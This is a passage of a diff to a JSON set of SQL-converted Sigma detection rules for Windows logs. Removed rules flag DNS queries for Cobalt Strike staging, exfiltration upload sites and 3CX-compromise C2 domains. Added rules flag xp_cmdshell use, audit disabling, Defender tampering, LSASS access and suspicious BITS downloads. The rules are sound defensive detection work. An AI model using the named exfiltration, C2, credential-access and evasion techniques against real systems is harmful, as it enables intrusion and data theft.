"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", + "status": "experimental", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE 
'\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' 
ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": 
"win_defender_restored_quarantine_file.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', 
'1117'))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_threat.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE 
'%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": 
"70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + ], + "filename": "win_defender_exploit_guard_tamper.yml" + }, + { + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate domain names matching 
the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL", - "author": "frack113", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) 
file by software other than browsers", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', 
